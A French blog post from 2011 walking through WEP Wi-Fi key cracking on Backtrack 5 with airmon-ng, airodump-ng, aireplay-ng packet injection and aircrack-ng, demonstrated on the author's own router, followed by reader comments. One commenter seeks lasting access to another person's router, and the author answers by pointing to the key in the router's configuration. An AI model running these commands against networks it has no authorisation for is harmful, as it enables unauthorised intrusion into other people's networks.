Skip to content
Advertisement
2011/06/16 / vpourchet

Backtrack 5 : Cracker un réseau Wifi protegé par clé WEP

Voici comment procéder pour cracker un réseau Wifi protegé par clé WEP. Pour commencer une capture de la config de notre routeur (linksys WRT54GL) du réseau que nous allons essayer de cracker.

    Nous passons maintenant notre adaptateur Wifi en mode monitor via la commande :

# airmon-ng start wlan0

    Le mode monitor est maintenant activé sur l’interface mon0. Nous scannons maintenant les réseaux via la commande :

# airodump-ng –write <fichier de sauvegarde> <interface>

    Nous obtenons ainsi :

    Certaines informations ont évidemment étés masquées En gros :

  • la partie supérieure liste les AP ou Access points wifi, avec principalement leur adresse mac, le SSID, et la méthode de chiffrement.
  • la partie inférieure liste les stations connectées aux AP.

Dans cet article nous nous intéressons à AP dont le SSID est : H@cKinG_Cr0wD. Nous entrons donc la commande :

# airodump_ng –write <fichier de sortie> — bssid <adresse mac du point d’acces> <interface>

Le scan se limite maintenant à la cible définie.

Le but est de collecter le plus de Datas (colonne #Data) possibles, or vous le constaterez surement, cela n’avance pas très vite, d’où l’utilité de la compatibilité du dongle avec l’injection de paquets. Nous allons donc utiliser l’injection pour booster un peu le trafic. On commence par tester une fausse authentification sur le réseau dans un nouveau terminal via la commande : # aireplay-ng -1 0 –e <ESSID du réseau wifi> -a <adresse mac de l’AP> -h <adresse mac de la station> <Interface>

Puis dans ce même terminal nous entrons la commande d’injection de paquets :

# aireplay-ng -3 -e <ESSID du réseau wifi> -b <adresse mac de l’AP> -h <adresse mac de la station> <interface>

Le nombre de datas devrait croitre rapidement.

Une fois un nombre conséquent atteint, et depuis un nouveau terminal, on lance la commande :

# aircrack-ng –x *.cap

Dans la liste affichée, on choisit l’identifiant de notre réseau.

Il ne nous reste plus qu’à patienter.

Il faut collecter un certain nombre d’IVS pour que l’attaque réussisse, patience donc.

Finalement après un certain temps :

    La clé : 496F313E33672724695A406132 est trouvée !

25 Comments

Leave a Comment
  1. Anonymous / Oct 24 2011 00:31

    Super tuto, merci beaucoup.

  2. Anonymous / Jan 16 2012 20:39

    MERCIE MEC

  3. Slipknotinfr / Feb 6 2012 22:15

    Quel tool utiliser svp ?

    • vpourchet / Mar 1 2012 10:03

      Ceux décrits dans l'article.

      Cordialement,

      V

  4. bico / Feb 9 2012 21:23

    merci nickel clair

  5. michima / Mar 23 2012 15:02

    arrivé sur cette ligne de commande "# aireplay-ng -3 -e -b -h " voici le message qui s'affiche :

    "mon1 is on channel 1, but the AP use channel 10 "

    que faire svp

    merci d'avance

    • vpourchet / Apr 29 2012 12:32

      Bonjour,

      Le channel doit etre spécifié dans le airmon.

      Cordialement,

      V

  6. nicky larson / Apr 9 2012 02:55

    merci pr c tt !!!

  7. ismael / Apr 17 2012 06:54

    slt peut tu me dire ce quoi "-h " (aireplay-ng -3 -e -b -h ) a cette étape peut ton utilise cette commande "aireplay-ng -1 0 -a (bssid) mon0"

    • vpourchet / May 15 2012 02:23

      -h smac : set Source MAC address

      l'option -h permet de fixer l'adresse MAC source. on peut l'utiliser en plus du BSSID je suppose (si SSID identiques multiples) pour affiner le aireplay, dans les autres cas ce n'est pas nécessaire à mon avis.

      Cordialement,

      V

  8. Anonymous / Apr 18 2012 18:53

    comment booter mn pc avec BC 5 ?

    • vpourchet / Apr 29 2012 12:18

      Bonjour,

      En l'installant sur une partition ou via un DVD bootable.

      Cordialement,

      V

  9. alex clusifs / Apr 24 2012 07:09

    doit on creer le fichier de sortie avent de commencer ou en passantla comande ca vas se creer tiout seul ( desole mais je commence tout juste a m,interesser a linux et je n,y connais pas grand chose encore .. ) merci a l'avance …!

    • vpourchet / Apr 29 2012 12:20

      Bonjour,

      Le fichier sera créé s'il n'éxiste pas.

      Cordialement,

      V

  10. medin / May 3 2012 15:21

    Bonjour,

    j'ai un accès à un routeur wifi de type SMC, parfois(quand il n'est pas sécurisé) , mais pas tout le temps, donc j'ai entrez sur l'adresse de ce routeur lorsqu'il était non sécurisé, et j'ai trouvé toute les donnés (SSID, MAC, …) je sais pas s'il y as une méthode pour que j'aurait toujours un accès à ce routeur meme lorsque son propriétaire le rend sécurisé. Ou bien existe-il des donnés que je peux avoir lorsque le routeur n'est pas sécurisé que je peux récupéré depuis l'interface admin du routeur et qui seront utile pour connaitre le mot de passe lorsqu'il sera sécurisé?

    merci

    • vpourchet / May 15 2012 02:11

      Bonjour,

      Si vous avez acces à la config du routeur vous devriez voir la clef de cryptage wifi non ? a moins qu'elle ne soit cryptée dans l'interface ?

      Cordialement,

      V

  11. Anonymous / May 10 2012 23:50

    Bonsoir,

    pour generer du traffic jai donc suivi la procedure # aireplay-ng -1 0 –e -a -h

    mais il me met en derniere ligne mon0 is on channel 1, but the AP uses channel 6

    comment procédé SVP

    Merci d'avance.

    • vpourchet / May 15 2012 02:06

      Bonjour,

      Comme indiqué dans les commentaires une erreur s'est glissée au niveau du tuto, la bonne méthode est de lancer le airmon sur le meme channel que l'AP en utilisant l'option –channel si ma mémoire est bonne. Dans votre cas il faut ajouter au airmon l'option –channel 6

      Cordialement,

      V

  12. Julien / Apr 15 2013 16:12

    Bonjour;

    Si on veut faire une fausse adresse MAC on peut prendre les six premiers octets d’un constructeur et improviser le reste
    Pourquoi vous avez censuré les adresses MAC, c’est quoi le risque pour la sécuriser des AP et des stations ?

    Je travaille sur un projet Wi-F et recherche une AP pour tester tous les audits qui marcheraient avec les attaques Chopchop et Framentation. Vous n’aurez pas une référence à me conseiller ? Sur le site officiel qui conseille des AP les firmwares on était mis à jour . Cela fait la deuxième AP que je test et à chaque fois il y a un défaut qui empêche de faire la pentest dans les règles de l’art. Merci d’avance pour votre aide.

  13. Julien / Apr 15 2013 17:09

    C’est bon j’ai trouvé mon bonheur, désoler du dérangement.

Trackbacks

  1. Backtrack 5 : Cracker un réseau Wifi protegé par clé WEP | Admin Reso

Leave a Reply

Your email address will not be published.